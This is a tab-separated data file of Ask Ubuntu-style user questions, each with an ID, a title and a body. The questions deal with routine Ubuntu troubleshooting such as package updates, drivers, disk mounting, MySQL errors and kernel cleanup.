482866	sqlite3 command line tool tab completion	does sqlite3 command line tool have `` tab '' autocompletion , and , if it does , how can i enable it ? for example , if i have a sqlite3 database file.db with table `` verylongtablename '' , i want to execute sqlite3 file.db , write `` select * from verylo '' and press tab , and get `` select * from verylongtablename '' ( as bash do such things with filenames ) .
482867	problem while updating 12.04 to 14.04	i currently have ubuntu 12.04 and when i try to update the version 14.04 after a while appears that message : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/hardy/universe/source/sources 404 not found [ ip : 91.189.91.14 80 ] w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/hardy/multiverse/source/sources 404 not found [ ip : 91.189.91.14 80 ] e : some index files failed to download . they have been ignored , or old ones used instead . then the upgrading process stops . how can i resolve this ?
482868	how to install longene linux unified kernel ?	i heard that longene linux unified kernel ( sourceforge link ) ( gibhub link ) will help me install windows apps and some people say it performs better than regular wine . i need to use windows apps on my ubuntu 13.10 . i have tried play on linux and wine but they wont work for my needs . please tell me how to install that linux unified kernel
482869	no desktop after installing gnome shell	two days ago , i 've tried to install gnome on ubuntu 14.04 using this command : sudo apt-get install gnome-shell ubuntu-gnome-desktop after that everything has been working well.but i 've noticed that there is no folder in the desktop , also i can not do `` right-clic '' on the desktop .
482876	is there a way to run the new paint tool sai version ( 1.2.0 ) on ubuntu 14.04 ?	i am a digital artist , and i found out that paint tool sai would be the best program available for my art . i have found a few tutorials on how to run pts on ubuntu , however there are a few issues . one of them being that on the tutorials the version of ubuntu is 12.04 , a no longer supported version . i use ubuntu 14.04 . and , the other issue is that paint tool sai has updated , the tutorials used the 1.1.0 version of pts , now the newest version is 1.2.0 . and the 1.1.0 is nowhere to be found in the original systemax website . so , can anyone help me out ? is there any way for me to run the new paint tool sai ( 1.2.0 ) on ubuntu 14.04 ?
482877	is it possible to have ubuntu ask for what application i want to open when xdg-open is exectuted for certain file/url ?	with bittorrent magnet links , sometimes i want to use deluge to open a particular link ( to download it ) , and sometimes i want to use peerflix to open it , so i can stream the torrent ( if it 's a video ) . how do i make ubuntu ask me what every time which application i want to use to open the magnet uri ? is it possible ?
482879	ubuntu 13.10 wo n't update . apt update and apt upgrade fail	update : ive reinstalled libreadline6 to no avail . im still getting the undefined symbol errors gpg : symbol lookup error : /usr/local/lib/libreadline.so.6 : undefined symbol : up any help appreciated . im trying to update my desktop ( i 've been away from internet for 6 months ) and im encountering some problems . apt-get update fails because a public key is unavailable , and apt-get upgrade fails when setting up apt , due to libreadline errors . im sure the problem is with my libreadline because during my 6mo without internet im pretty sure i rebuilt it from source ( and encountered other problems in doing so ) to try and embed the lua interpreter into a program . more details on that can be found in my post here : http : //stackoverflow.com/questions/22727700/g-undefined-references-with-lua-and-libdl here is my apt-get update output . its cut down because its recognizing the links and wont let me post because my rep is below 10 . fetched 316 b in 5s ( 59 b/s ) reading package lists ... done w : gpg error : https : //private-ppa.launchpad.net saucy release : the following signatures could n't be verified because the public key is not available : no_pubkey e131728675254d99 my apt-get upgrade fetched 360 mb in 3min 28s ( 1,730 kb/s ) extracting templates from packages : 100 % preconfiguring packages ... setting up apt ( 0.9.9.1~ubuntu3.1 ) ... gpg : symbol lookup error : /usr/local/lib/libreadline.so.6 : undefined symbol : up gpg : symbol lookup error : /usr/local/lib/libreadline.so.6 : undefined symbol : up dpkg : error processing apt ( -- configure ) : subprocess installed post-installation script returned error exit status 127 no apport report written because maxreports is reached already errors were encountered while processing : apt e : sub-process /usr/bin/dpkg returned an error code ( 1 )
482883	speed up script	which shell command is the fastest way to parse through millions of lines of text . currently i 'm using grep in my script but it takes hours upon hours to finish . sample input : may 1 2014 00:00:00 allow may 1 2014 00:00:00 allow may 1 2014 01:00:00 deny may 1 2014 01:00:00 deny may 1 2014 02:00:00 allow may 1 2014 02:00:00 deny sample output : ( where `` 2 '' in line one is 'grep -c `` allow '' ' and `` 0 '' is 'grep -c `` deny '' ' ) may 1 2014 00:00:00,2,0 may 1 2014 01:00:00,0,2 may 1 2014 02:00:00,1,1
482884	i ca n't log in to gmail in ubuntu on an specific isp	it 's weird that i have this problem just in ubuntu not in windows . i ca n't log in to gmail in ubuntu at home ( the specific isp ) . but i can log in to gmail in ubuntu ( the same laptop ) at the office . i do n't have any problem with gmail in windows at home or office , it just happen in ubuntu at home . i 'm really curious what windows has that ubuntu has n't got ? i tried both 13.10 and 14.04 . nothing happenes after entering my username , password and verification . edit : i disabled the 2 step verification . it does n't have any effect on this problem . edit2 : i can visit other sites . my problem is just with gmail . and i can log in using gmail in sites like askubuntu.com
482890	sound from stereo to rca plugged to line in only records left channel	okay , so we play with turntables . stereo audio from the vinyls are connected to a stereo to rca adaptor , which is then plugged into the line in of my netbook . when i 'm on windows 8 , we use butt to broadcast what we play , and the audio input does n't have problems at all , the program recognizes stereo input . my netbook experiences occasional system freezes when using windows though . my problem is when we use butt on bodhi 2.4 ( it is based on ubuntu precise so this question is still probably valid ) , only the left channel is actually recording sound , even when it is set to record stereo input . when i enable the mic on the playback ( in alsamixer ) and reboot the os , butt `` picks up stereo input , '' but it is mostly stuttering or garbled input . i do n't have pulseaudio installed there , i have a hda intel sound card , if that helps . and i am also using an unmodified 3.14.5-lowlatency kernel . ( because i read that low latency kernels are good for stuff like shoutcast ) what should i do to make the audio input clear and have butt properly pick up the original stereo input ? or at least , just the clear audio part ?
482891	password while file deletion	what are the different ways of encrypting files other than zip compression with password ? i also want to get prompted for my password while permanently deleting some files , both password protected and not password protected files . what should i do for that ? i have ubuntu 14.04 .
482892	installing clamav-0.98.3 on ubuntu 12.04 for the first time	i 've tried to install clamav but everytime i get this error 'openssl not found ' . i 'm new to ubuntu and i do n't know what to do . can somebody please hepl me ?
482895	elf shared libraries	i have a question about using libraries on linux . lets say i have a program called myprog and two libraries libabc.so and libxyz.so . myprog loads the module libabc.so with `` dlopen rtld_now '' . `` dlopen '' fails because i am using functions of libxyz.so and myprog was not linked with libxyz.so . can i link a shared library to another shared library ?
482897	unable to save excel ( xlsx ) file	i am unable to save excel file . it is showing below error message . `` errors were detecting while saving 'c : \users\waseem\my documents\waseem saifi.xlsx ' . microsoft office excel may be able to save the file by removing or repairing some features . to make the repairs in new file , click continue . to cancel saving the file , click cancel . '' when i am clicking on continue button , then it is showing below error message . `` document not saved . ok. '' after enter , nothing happens . and i return to my unsaved file . please help me . i am completely new to ubuntu and i do lots of work in microsoft excel . regards , waseem saifi
482899	edit file in shell script	i 'm new to linux . i 'm running a simulation package on linux . for each iteration , a file as below will be generated . i need to do some modification and then use the modified file as an input for the next iteration . i want to finish this modification by shell script then i do n't need to do it manually after each iteration . the modification is as follows : there are x y z coordinates from the 9th line ( below direct ) . the third column of each line should be multiplied by a constant ( say 1.03 ) . how should i do it in shell script ? i can do that in matlab but i 'm not familiar with the commands in linux . thank you ! # # # # the generated file starts from next line poscar for fcc cu ( created manually ) 1.00000000000000 7.6799999999999997 0.0000000000000000 0.0000000000000000 3.8399999999999999 6.6509999999999998 0.0000000000000000 0.0000000000000000 0.0000000000000000 41.0000000000000000 72 40 40 selective dynamics direct 0.0000000000000000 0.0000000000000000 1.0000000000000000 f f f 0.9999979999999979 0.3328410000000019 1.0000000000000000 f f f 0.9999960000000030 0.6656819999999968 0.0000000000000000 f f f 0.3328369999999978 0.0000000000000000 0.0000000000000000 f f f 0.3328360000000004 0.3328410000000019 2.0000000000000000 f f f 0.3328339999999983 0.6656819999999968 3.0000000000000000 f f f 0.6656750000000002 0.0000000000000000 5.0000000000000000 f f f 0.6656729999999982 0.3328410000000019 2.0000000000000000 f f f 0.6656710000000032 0.6656819999999968 1.0000000000000000 f f f
482900	flash player ( in firefox ) is unstable in 14.04	for 13.10 , i used this guide to get intel igpu-supported playback of flash videos in firefox : http : //www.webupd8.org/2013/09/adobe-flash-player-hardware.html all in all , intel graphics acceleration for flash content was working just fine in 13.10 , at least on my machine ( with xubuntu ) . i basically followed the guide to do the same for 14.04 , but about 2-3 weeks ago flash videos started acting up . whenever i have one instance of flash paused or stopped in one tab and go to the next tab to continue some song on soundcloud or something , it 's game over . i 'm clueless as to what i can do here . did anything change in the meantime ?
482903	can not update because of missing packages ( 12.04 lts )	i 'm not being able to update my ubuntu 12.04 because of missing packages , how can i solve it ? here 's a link of the error i 'm getting every time i want to update : thanks in advance
482904	s3cmd causing huge memory usage on 12.04 server	today i installed s3cmd on my server to facilitate backups to s3 . everything is working great , and i even scheduled a cron job to regularly back up . then i went and checked my media temple dashboard and saw that the memory has gone up all of a sudden . ( they wo n't let me post an image here of the graph , but it goes from 70 % max to upwards of 110 % ) i understand the memory is going to be affected by running a backup , but when it 's done , why is it not releasing anything ? even restarting apache2 only gets the memory usage back down for a few minutes , and then it 's back up .
482908	frontech usb tv stick not working on ubuntu	i have a frontech usb tv stick ( analog ) but it is not working with ubuntu 14.04 . below is the lsusb output . bus 003 device 003 : id 1c88:0035 somagic , inc. lsusb -v -d 1c88:0035 bus 003 device 005 : id 1c88:0035 somagic , inc. could n't open device , some information will be missing device descriptor : blength 18 bdescriptortype 1 bcdusb 2.00 bdeviceclass 0 ( defined at interface level ) bdevicesubclass 0 bdeviceprotocol 0 bmaxpacketsize0 64 idvendor 0x1c88 somagic , inc. idproduct 0x0035 bcddevice 1.00 imanufacturer 1 iproduct 2 iserial 3 bnumconfigurations 1 configuration descriptor : blength 9 bdescriptortype 2 wtotallength 50 bnuminterfaces 1 bconfigurationvalue 1 iconfiguration 0 bmattributes 0x80 ( bus powered ) maxpower 500ma interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 0 balternatesetting 0 bnumendpoints 0 binterfaceclass 255 vendor specific class binterfacesubclass 255 vendor specific subclass binterfaceprotocol 255 vendor specific protocol iinterface 0 interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 0 balternatesetting 1 bnumendpoints 1 binterfaceclass 255 vendor specific class binterfacesubclass 255 vendor specific subclass binterfaceprotocol 255 vendor specific protocol iinterface 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x82 ep 2 in bmattributes 5 transfer type isochronous synch type asynchronous usage type data wmaxpacketsize 0x03ff 1x 1023 bytes binterval 1 interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 0 balternatesetting 2 bnumendpoints 1 binterfaceclass 255 vendor specific class binterfacesubclass 255 vendor specific subclass binterfaceprotocol 255 vendor specific protocol iinterface 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x82 ep 2 in bmattributes 5 transfer type isochronous synch type asynchronous usage type data wmaxpacketsize 0x1400 3x 1024 bytes binterval 1
482916	rsync exclude hidden files doesnt work !	i’ve searched all over the internet and everybody suggests the same thing - that adding -- exclude=´ . *´ should exclude hidden files and folders from an rsync . it doesn’t . i´ve also tried adding a slash and/or double quotes eg . -- exclude=¨\ . *¨ nothing seems to work . agh ! ! would really appreciate some help .
482917	can not play dvds on ubuntu	on ubuntu 12.04 i ca n't play dvds in vlc , the native dvd player , or parole media play . i must be missing something . what libraries/codecs do i need etc. ? where do i get them ? where do i find out where to get them ?
482923	mysql error : the partition with /var/lib/mysql is too full !	i get this error when trying to start mysql : the partition with /var/lib/mysql is too full ! here is the output of df -h : filesystem size used avail use % mounted on /dev/sda1 455g 77g 356g 18 % / none 4,0k 0 4,0k 0 % /sys/fs/cgroup udev 1,9g 4,0k 1,9g 1 % /dev tmpfs 387m 1,3m 386m 1 % /run none 5,0m 0 5,0m 0 % /run/lock none 1,9g 1,2m 1,9g 1 % /run/shm none 100m 28k 100m 1 % /run/user this shows that the partition is nowhere near full .
482924	need help on wn-block ( 0 , 0 ) call trace	https : //www.youtube.com/watch ? v=bt-2lyfxfwm i am facing this same problem . when i was searching i found someone already uploaded this problem related video on youtube . i am trying to install ububtu 14.04 64 bit lte on my dell inspirion 5437 by bootable pendrive . but facing this kind of problem . what is the solution ?
482925	ubuntu 13.10 terminal window disappears	i think it maybe something to do with the video card driver ; however , i updated the driver and the terminal window disappears unless i hover over the terminal icon on the dock or try to move the actual window . if i hover over the window the cursor acts like i 'm hovering over text but i ca n't see anything . also , if i finally get the window to become visible and i start typing , everything i typed becomes clear ( it acts like there is a transparent background ) . any help would be appreciated . i 'm not 100 % sure on the video card , it 's an old computer that was given to me . i 'll check the video card when i get home , but i 'm not 100 % certain that the driver is the problem.. terminal is the only thing that does this . the transparency is n't checked in the settings for terminal or anything .
482928	ignore apt-get postinstall scripts automatically	we have a script we is installing multiple packages , but should skip any actions in postinstall scripts . i tried this : touch /var/lib/dpkg/info/packagename.postinst chmod +x /var/lib/dpkg/info/packagename.postinst /usr/bin/apt-get -- force-yes -- assume-yes install packagename but it seems to ovewrite /var/lib/dpkg/info/packagename.postinst
482930	ubuntu 14.04 lts wubi installer	please give me the link to the windows installer of ubuntu 14.04 lts for windows 7 64 bit .
482932	sudo : unable to stat /etc/sudoers.d/readme : no such file or directory	whenever i use sudo command i get this message : sudo : unable to stat /etc/sudoers.d/readme : no such file or directory i ran into this trouble when i was strugling with chmod using which i changed the permissions on /etc/sudoers , /etc/sudoers.d and also /etc/sudoers.d/readme i solved the issue with /etc/sudoers from this link . nut now when i look at the permissions of the file /etc/sudoers.d/readme , it says 'the permissions of readme could not be determined' this happens when i use ls ls -l /etc/sudoers.d/ ls : can not access /etc/sudoers.d/readme : permission denied total 0 - ? ? ? ? ? ? ? ? ? ? ? ? ? ? readme
482939	unity launch button changes color in 14.04- why ?	i just noticed for the first time that the ubuntu 's `` start button '' equivalent can be different colors . yesterday i had to take a screenshot to debug something , and the button was blue . but today it 's green . what does this signify ? also , what are the approprate terms for the launcher , 'start button ' etc so i can do a better google search on the issue next time ?
482942	send shell to server via sms	hi this might be a duplicate and if so i 'd really appreciate if i could get refereed to that question . so i 'm looking for some way to connect a phone to my ubuntu 12.04 lts server and send shell commands to it via sms . ca n't seem to find a program that does that . could someone recommend one ? thanks in advance , carl
482957	does timeshift backup provide ( osd ) notifications in ubuntu ?	i am trying timeshift backup program for the first time in my ubuntu 14.04 64-bit system . setup and use is simple enough but i am used to ubuntu 's default program `` deja-dup '' providing persistent pop up notifications when it 's time to run a scheduled backup . i 've setup a scheduled backup in timeshift , but i have not seen any notifications even though the date has already passed . does anyone know if timeshift provides the same ubuntu pop up notification ( notify osd ) ? their website does not mention this , that i could find : http : //www.teejeetech.in/p/timeshift.html
482958	hangout plugin for chrome stable and ubuntu 14.04	the google hangout plugin does n't want to install for chrome stable which browser i am using inside of ubuntu 14.04 . any suggestions or solutions to this ?
482964	force re-creation of active directory home directories	i 've installed lubuntu desktop 14.04 in a vbox virtual machine and joined it to active directory following likewise-open | 14.04 | other easy way to connect ad ? . i was able to login graphically with ad accounts but messed up something with enabling ad sudoers and tab completion was broken in xterm . i tried changing the login shell to bash as per the guide above , but that did n't fix anything so removed /home/local/domain to try again . ( they were created automatically previously , i thought same would happen again . wrong ! ) now graphical ad logins are broken . i can login with a local account using the graphical login screen . but ad accounts fail : the password appears to be accepted , the screen goes black for a couple of seconds , and then the login screen reappears . commands like id ad_user_name correctly return user uid and group membership info so i know ad integration is operational . if i login graphically with a local account , then from an xterm shell ssh ad_user_name @ localhost is successful , but with an error message : could not chdir to home directory /home/local/domain/ad_user_name and in fact those folders do not exist . so , how do i force re-creation of ad home directories and their default contents ? i 've read home directory not being created and how to make user home folder after account creation ? but they 're about local users ( only ? ) , and i 'm hesitant to break things even more badly than i have already .
482968	wireless mouse dougle need intserted into usb port to make mouse work 14.04 lts	recently i installed 14.04 lts in my new laptop . i observed my wireless mouse do not work after the boot but it is working fine if reinserted in the one usb port again after the login need to resolve this issue . need help . linux abuzar 3.13.0-24-generic # 46-ubuntu smp thu apr 10 19:11:08 utc 2014 x86_64 x86_64 x86_64 gnu/linux
482969	how to boot ubuntu 14.04 cd on toshiba m45-s165	i formatted my toshiba m45-s165 . burned ubuntu 14.04 several times to dvd . it wo n't boot the dvd . it boots format tool . it boots toshiba recovery disk ( win xp ) . it also boots win 7 repair dvd . i also tried to boot mint disk and that wo n't work . is it a toshiba/linux issue ?
482970	integrate chrome tab bar with ubuntu	i need your help with a customization issue please . i 'm a sucker for small details and my ocd starts acting up if things are n't my way . so , i 've installed the latest google chrome on ubuntu , now how do i go about getting the green ( + ) sign on the tab bar ( the one you hit to open a new tab ) and how to get the ( x ) sign ( the one you hit to close the tab ) to look like the one from the native firefox that comes with ubuntu . thanks a bunch
482971	how does the terminal work ?	explaining more on this question . are commands like ls , cd , rm , ... applications if they are than how does the terminal knows where they are , and is the terminal just a interface to interact with the programs , is nothing more than just programs just interacting with each other ? secondly , is bash the only language that will work in the terminal , if it is just programs just interacting with each other ?
482974	ubuntu does n't boot directly from refind	i installed ubuntu studio alongside mac os x lion on a macbook 3,1 with the help of refind . i can boot mac os or load grub ( grubx64.efi ) correctly . however , if i choose to boot ubuntu directly from refind ( three options are listed ) , the screen gets stuck at refind - booting os starting vmlinuz-3.130-29-lowlatency using load option 'ro root=uuid= ( long number ) initrd=boot\initrd.img-3.13.0-29-generic' does someone know how to fix it so that i can load ubuntu directly from refind without going to grub first ?
482976	how to avoid excessive hard disk load cycles	some years ago there was a lively discussion about ubuntu reducing the hard disk lifespan by operating the hard disk in an aggressive power saving mode on default , which causes an excessive number of load cycles . i 've just checked the status on my xubuntu 14.04 laptop with smartctl -a /dev/sda . result : 4211 load cycles in 180 hours . when the power adapter is unplugged and the laptop runs on battery , every ~3 seconds a new load cycle happens . this is way too much . so my question is : has anything changed since that discussion ? what should i do to reduce the frequency of load cycles ? are the old solutions still valid / state of the art ?
482981	lubuntu installation problem	i installed lubuntu alongside with windows 7 . i cleared some space for it in a separate partition and it automatically took tat space and installed . but the problem is that the lubuntu does not have wifi or anything . maybe the installation is corrupt . so i was thinking of installing it again . but now it is recognizing the other lubuntu and the windows is not found . so this time i give install alongside , it shows be the other lubuntu . so now how to remove lubuntu fully so that i can install it again . also now when i see in disk management in windows , i am able to see unnamed partitions , but the recovery partititon tat used to present is currently missing ! ! please help ! !
482986	about ubuntu support	i want to ask about the pricing model for ubuntu support for server deployments from canonical on the order of 30 instances ( 12.04 and 14.04 lts ) what is the pricing and support framework that canonical provides ? what instance management services can they provide ? thanks , aamir tauqeer
482990	ca n't mount /dev/sda1 , ( initramfs ) on boot	today i went through the process of updating an old computer 's ubuntu from 11.04 to 14.04 . in total i did 3 updates , all wen fine until the end of the very last update . when i pressed `` reboot now '' , the system eventually ended up freezing displaying the default ubuntu login background . i waited for some time , but it did n't seem to do anythting , so i chose to terminate the system . after this , the system would show me this on boot : mount : mounting /dev/loop0 on /root failed : invalid argument mount : mounting /dev on /root/dev failed : no such file or directory mount : mounting /sys on /root/sys failed : no such file or directory mount : mounting /proc on /root/proc failed : no such file or directory target filesystem does n't have requested /sbin/init . no init found . try passing init= bootarg . busybox v1.21.1 ( ubuntu 1:1.21.0-1ubuntu1 ) built-in shell ( ash ) enter 'help ' for a list of built-in commands . ( initramfs ) it 's probably also worth to note here , that the same partition ( /dev/sda1 ) has both windows 7 and ubuntu installed in dual-boot . booting to windows works fine . i 've tried doing chkdisk in windows , and tried fixing the partition in an ubuntu alternate install usb . i 've dug all internet round to try to find a solution to my problem , but none i tried has worked so far . edit : i looked around a bit , and realized i had installed ubuntu with wubi . well , i 'm stupid . and also i terminated the system from the power button ... but i 'd still like to resolve this . edit 2 : ran boot-repair ( https : //help.ubuntu.com/community/boot-repair ) from a live usb , got this link : http : //paste.ubuntu.com/7643586 , and the system now boots fine . ubuntu is now cleaning up the drive , let 's hope it works ! edit 3 : fsck would n't work , decided to install ubuntu again on another partition !
482994	phpmyadmin will not let me log in , and mysqld.sock is missing	i have quite a few errors when trying to make a website with lamp . error # 1 : mysql : ( i have no idea what 's causing it . ) mysqld.sock is missing . when i type in $ mysql it will say it ca n't connect to socket . i look all over my laptop 's files and i ca n't find it anywhere . error # 2.a : phpmyadmin : # 2002 can not log in to the mysql server when i try to log into phpmyadmin this error will show up . anything i do , this message will appear up all the time error # 2.b : phpmyadmin : connection for controluser as defined in your configuration failed . i put in `` root '' for my user and this shows up . i was n't able to choose my user while installing , only my password . error # 2.c : phpmyadmin : phpmyadmin was unable to read your configuration file ! this might happen if php finds a parse error in it or php can not find the file . please call the configuration file directly using the link below and read the php error message ( s ) that you receive . in most cases a quote or a semicolon is missing somewhere . if you receive a blank page , everything is fine . /etc/phpmyadmin/config.inc.php i had n't have edited my config.inc.php file , except when i changed `` localhost '' to `` 27.0.0.1 '' and i put `` root '' in the controluser . can someone help ? ? i went on at least 30 pages on google to help me with this . none of them worked . i am a big noob , so bear with me .
482997	ca n't change appearance on ubuntu 14.04	trying to change gtk theme , icon theme or wallpaper and results in nothing . when i try to remove things from the launcher , they come back ... already tryed to remove `` ./compiz '' , `` ./config '' and `` .profile '' from /home/ '' my_user '' but the problem persists . i 'm using ubuntu tweak 0.8.7 , and my home is encrypted ( actually , i 'm receiving a error message about encryption during boot time ) . i 'll truly appreciate some help , thanks !
482998	what does ubuntu core consist of ?	exactly what does ubuntu core consist of ? i know of a similar project called ubuntu mini remix , which , while not an official ubuntu project , is known to contain : ubuntu-minimal metapackage ubuntu-standard casper lupin-casper what does ubuntu core contain ? what are the differences between the purposes of these two projects ? i would like to make sure of this before i choose a starting point to build my own ubuntu derivative .
483000	how to download google spreadsheets using terminal ?	hello i am using ubuntu 12.04 . i need to access many google spreadsheets which are shared with many collaborators . how can i download them using terminal ?
483002	where do i start to create my own ubuntu derivative ?	i would like to create my own ubuntu derivative with my desktop environment of choice and my preferred set of prepackaged programs . what base should i start with and what modifications should i start adding ? i know two possible starting points : ubuntu core , an official set of bare necessities ( which ones ? ) that seems suitable for creating appliance firmware or one 's very own linux distribution . unlike jeos that came before it , this is not a complete distribution , as it lacks a bootable image with an installer or a boot loader . ubuntu mini remix , a fully working ubuntu livecd containing only the minimal set of software to make the system work ; not an official ubuntu project . probably i could use ubuntu server or something else as a base . then , i need to customize my distribution . i know of the following tools : ubuntu customization kit ubuntu builder customizer that should allow for me to easily customize my installation media . but what if i need not just something to create a one-off remix of ubuntu for my own enjoyment , but a maintainable project with all its trappings : i guess i need to have a set of scripts trackable by version control system , amenable for automated testing and building with some build infrastructure . that 's how they build a halfway decent os distribution , right ? how should i best start creating my own ubuntu derivative in a way that could naturally transcend a one-off custom cd for myself , and be built in a more controlled , robust manner , like proper ubuntu derivatives supposedly do ?
483004	installing ubuntu question	i have a question about installing ubuntu 14.04 ( i think , it 's the newest distro . to my knowledge ) . i am currently running a dual boot to test it out , and i really love it ! my question is , will i be able to transfer files from my windows to my ubuntu before completely installing , and will i be able to save my windows restore files just incase i want to go back to windows 8 ?
483005	what is the difference between gnome-awesome session and pure xsession ?	i am trying to use awesome tiling window manager and i figured i have a choice of running awesome as gnome session or pure xsession . what is the difference between the two and when would i want each one ?
483006	dvd rip handbrake ubuntu 12.04	how do i rip dvd using handbrake ubuntu 12.04 ? i have looked on the web but have found nothing that is helpful . all i want to do is rip dvd 's to a medium quality to watch later . they 'll be stored on an external storage device not on discs . thank you in advance .
483007	linux newbie with komodo edit installation issues	i am newbie to the lamp world . i was watching a tutorial that needs komodo edit . i downloaded it but cant get the installer to run the way you just click the extraction file in windows . any suggestions on what to do , maybe a solution from the terminal ?
483009	mounting disk image in raw format	while trying to mount a disk image in raw ( dd ) format using the following command mount nps-2010-emails.dd /media/manu/ i get the following error message mount : you must specify the filesystem type i know that using -t we can specify the file system but what is the terminology for a raw ( dd ) file , which can pe passed as an argument to the mount command . if my method to mount this file system is wrong please help me out in doing the same . on typing the command file -s nps-2010-emails.dd the output is as follows : nps-2010-emails.dd : x86 boot sector ; partition 1 : id=0xb , starthead 254 , startsector 1 , 20479 sectors , extended partition table ( last ) \011 , code offset 0x0 the output of fdisk -l nps-2010-emails.dd is as follows disk nps-2010-emails.dd : 10 mb , 10485760 bytes 255 heads , 63 sectors/track , 1 cylinders , total 20480 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system nps-2010-emails.dd1 1 20479 10239+ b w95 fat32
483013	how to extend files system	i am running trusty tahr under vmware fusion 6.03 on a mac mavericks . i installed trusty tahr using defaults given by fusion - specifically a 20gb vm . i want to increase that to 40gb . using vm fusion i was able to increase the vm size and sda partition to 40gb . gparted reports sda as 40gb with 20gb unallocated . it shows sda1 at 20gb . df -m / reports filesystem at 20gb . resize2fs returned 'filesystem already at 20gb nothing else to do . ' how do i extend the / files system to 40gb ? from my old sun os days , because it is the root file system you could n't do maintenance on a mounted files system , you would boot off of install media and do the necessary stuff . i do n't know how to do that running a vm under mac os x . thanks
483016	what is hdmi audio ?	i see `` juniper hdmi audio '' under my sound devices list . my question is , what is it and what does it do ? currently , adjusting the volume level does nothing . google searches do n't give a very clear explanation of it , other than that hdmi can `` handle '' audio .
483022	trying to get ethernet working for intel 82562ez 10/100 .	i got an old dell dimension 4600 for free and i want to get linux on it . ubuntu not required , but it 's what i have running now . lspci -v tells me : ethernet controller : intel corporation 82562ez 10/100 ethernet controller ( rev 02 ) subsystem : dell device 0174 flags : bus master , medium devsel , latency 64 , irq 20 memory at fbfff000 ( 32-bit , non-prefetchable ) [ size=4k ] i/o port sat df40 [ size=64 ] capabilities : < access denied > kerneldriver in use : e100 this is without modifying anything . i 'm surprised the driver that came with ubuntu did n't work . intel provides a linux driver here : https : //downloadcenter.intel.com/detail_desc.aspx ? dwnldid=2896 & agr=y but when i try to make install i get an error , which is addressed in the readme : driver compilation -- -- -- -- -- -- -- -- -- when trying to compile the driver by running make install , the following error may occur : `` linux kernel source not configured - missing version.h '' to solve this issue , create the version.h file by going to the linux source tree and entering : make include/linux/version.h . what do they mean go to the linux source tree ? i did n't get an /include/ directory in the tarball .
483023	customized ubuntu 14.04 - dns does n't work	i 've made a ubuntu 14.04 vm , customized it a bit ( apps , etc ) , and created an .iso via remastersys . i then made a bootable usb w/ unetbootin . the dns works on the vm and on multiple laptops in the house but the bootable usb fails to resolve urls . the bootable usb does successfully connect to the internet and can ping ips . i 've searched and tried editing the /etc/resolvconf/resolv.conf.d/head and base files , i 've tried adding google dns ( 8.8.8.8 ) in the network manager , nothing works . ( it 's worth noting i make these changes on the vm , reboot , then create the .iso again and make it bootable ) . any help would be greatly appreciated . thanks !
483027	fail with ati graphics disabled	i 've encountered following issue . my laptop has dual graphics - intel hd3000 / ati radeon hd 6490m . before i have ubuntu 13.10 and everything was ok . when i installed 14.04 things looks like this : apt-get install fglrx fglrx-amdccle , when i have ati enabled fglrxinfo output is correct . problem is when ati is disabled - output of fglrxinfo is following : libgl error : dlopen /usr/lib/fglrx/dri/i965_dri.so failed ( /usr/lib/fglrx/dri/i965_dri.so : can not open shared object file : no such file or directory ) display : :0 screen : 0 opengl vendor string : intel open source technology center opengl renderer string : mesa dri intel ( r ) sandybridge mobile opengl version string : 3.0 mesa 10.1.3 despite this error everything works but i 'm wondering if there is some way to disable this error .
483029	how to configure the mouse wheel button ?	i have a basic optical wheel mouse ( white & grey , 2-button + wheel ) . the scroll function operates when i roll the wheel , the wheel-click works for opening a link in a new tab , but the document / webpage wheel-click scroll-lock function does not work to move within a document / page . when i check the settings , in ubuntu , for the mouse there are no options for the wheel . do i need a driver for my wheel mouse ?
483030	how to remove old kernels properly ?	so i googled how to clean up old kernels . i am very inexperienced with ubuntu . so i am not sure if i broke something up . firstly to check the latest kernel , i used : uname -r my output was : - 3.2.0-37-generic then i tried : - dpkg -- list | grep linux-image the ouput was : - ii linux-image-3.2.0-29-generic 3.2.0-29.46 linux kernel image for version 3.2.0 on 64 bit x86 smp ii linux-image-3.2.0-30-generic 3.2.0-30.48 linux kernel image for version 3.2.0 on 64 bit x86 smp ii linux-image-3.2.0-31-generic 3.2.0-31.50 linux kernel image for version 3.2.0 on 64 bit x86 smp ii linux-image-3.2.0-32-generic 3.2.0-32.51 linux kernel image for version 3.2.0 on 64 bit x86 smp ii linux-image-3.2.0-33-generic 3.2.0-33.52 linux kernel image for version 3.2.0 on 64 bit x86 smp ii linux-image-3.2.0-34-generic 3.2.0-34.53 linux kernel image for version 3.2.0 on 64 bit x86 smp ii linux-image-3.2.0-35-generic 3.2.0-35.55 linux kernel image for version 3.2.0 on 64 bit x86 smp ii linux-image-3.2.0-36-generic 3.2.0-36.57 linux kernel image for version 3.2.0 on 64 bit x86 smp ii linux-image-3.2.0-37-generic 3.2.0-37.58 linux kernel image for version 3.2.0 on 64 bit x86 smp if linux-image-3.2.0-38-generic 3.2.0-38.61 linux kernel image for version 3.2.0 on 64 bit x86 smp if linux-image-3.2.0-39-generic 3.2.0-39.62 linux kernel image for version 3.2.0 on 64 bit x86 smp iu linux-image-server 3.2.0.38.46 linux kernel image on server equipment . so i was supposed to remove all kernels below 37 , right ? i used : apt-get purge linux-image-3.2.0-29-generic and the outcome : reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : linux-server : depends : linux-headers-server ( = 3.2.0.38.46 ) but 3.2.0.39.47 is to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . did i mess something up ? because now /boot is using 98.7 % . so now i need help fast !
483034	terminal not accepting input	my terminal is not accepting any input for my password as a result im unable to get any work done for some time now ... ... any help would be really appreciated.thank you
